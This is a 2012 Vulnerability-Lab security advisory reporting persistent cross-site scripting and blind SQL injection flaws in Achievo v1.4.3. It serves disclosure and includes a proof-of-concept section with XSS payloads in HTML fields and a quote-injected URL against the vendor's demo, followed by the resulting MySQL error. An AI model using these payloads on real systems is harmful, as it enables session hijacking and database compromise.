135 lines
4.5 KiB
Text
Executable file
135 lines
4.5 KiB
Text
Executable file
Title:
|
|
======
|
|
Achievo v1.4.3 - Multiple Web Vulnerabilities
|
|
|
|
|
|
Date:
|
|
=====
|
|
2012-01-30
|
|
|
|
|
|
References:
|
|
===========
|
|
http://www.vulnerability-lab.com/get_content.php?id=403
|
|
|
|
|
|
VL-ID:
|
|
=====
|
|
403
|
|
|
|
|
|
Introduction:
|
|
=============
|
|
Achievo is a flexible web-based resource management tool for business environments.
|
|
Achievo s resource management capabilities will enable organisations to support their business
|
|
processes in a simple, but effective manner.
|
|
|
|
A solution that fits seamlessly to the wishes of every organisation and offers the possibility
|
|
and freedom to adapt the functionality to the needs of the organisation. It will fit into every
|
|
organisation because Achievo is extremly easy to change to your specific situation.
|
|
|
|
(Copy of the Vendor Website: http://www.achievo.nl/product/ )
|
|
|
|
|
|
Abstract:
|
|
=========
|
|
Vulnerability-Lab Team (Chokri B.A.) discovered Multiple Web Vulnerabilities on the resource management tool Achievo v1.4.3.
|
|
|
|
|
|
Report-Timeline:
|
|
================
|
|
2012-01-30: Public or Non-Public Disclosure
|
|
|
|
|
|
Status:
|
|
========
|
|
Published
|
|
|
|
|
|
Exploitation-Technique:
|
|
=======================
|
|
Remote
|
|
|
|
|
|
Severity:
|
|
=========
|
|
High
|
|
|
|
|
|
Details:
|
|
========
|
|
Multiple persistant cross site & a blind SQL vulnerabilities are detected on the resource management tool Achievo v1.4.3.
|
|
The bug allows remote attacker to implement malicious script code on the application side and/or to execute sql commands via
|
|
remote sql injection attack..
|
|
Successful exploitation of the vulnerability allows an attacker to manipulate specific modules & can
|
|
lead to session hijacking (user/mod/admin) and/or to compromise the application & dbms.
|
|
|
|
|
|
Vulnerable Module(s):
|
|
[+] Users preferences
|
|
[+] Projects
|
|
[+] Download vcard ( SQLi )
|
|
|
|
Picture(s):
|
|
../1.jpg
|
|
../2.jpg
|
|
|
|
|
|
Proof of Concept:
|
|
=================
|
|
The vulnerabilities can be exploited by remote attackers with low required user inter action. For demonstration or reproduce ...
|
|
|
|
1.
|
|
<select class="atkManyToOneRelation" name="atksearch_AE_coordinator_AE_coordinator[]"><option value="">Search all
|
|
</option><option value="__NONE__">Nothing selected</option><option value="1
|
|
" >"><img src=image.jpg onerror=alert(123); /> [X]
|
|
, test (manager)</option><option value="2" >
|
|
|
|
2.
|
|
<td valign="top" class="fieldlabel"><b>Project:</b> </td>
|
|
<td valign="top" class="field" >
|
|
"><img src: "><img src=image.jpg onerror=alert(1234); /> [X]
|
|
</td></tr>
|
|
|
|
3.
|
|
http://www.achievo.nl/demos/achievo/stable/dispatch.php?atkaction=vcard&atklevel=1&atkprevlevel=0&atkstackid=4f2467eae0518&id=3'
|
|
|
|
Critical: Unknown error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'contact') ORDER BY person.role, person.lastname' at line 1).
|
|
Halted
|
|
error: [+0.19090s / 0.00036s] Unknown error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'contact') ORDER BY person.role, person.lastname' at line 1)
|
|
Halted...
|
|
|
|
|
|
Risk:
|
|
=====
|
|
1.1
|
|
The security risk of the persistant xss vulnerabilities are estimated as medium(+).
|
|
|
|
1.2
|
|
The security risk of the blind sql injection vulnerabilities are estimated as high(+).
|
|
|
|
|
|
Credits:
|
|
========
|
|
Vulnerability Research Laboratory - Chokri B.A (Me!ster)
|
|
|
|
|
|
Disclaimer:
|
|
===========
|
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
|
|
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
|
|
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
|
|
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
|
|
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
|
|
may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-
|
|
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of
|
|
other media, are reserved by Vulnerability-Lab or its suppliers.
|
|
|
|
Copyright ? 2012|Vulnerability-Lab
|
|
|
|
|
|
--
|
|
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
|
|
Contact: admin@vulnerability-lab.com or support@vulnerability-lab.com
|
|
|
|
|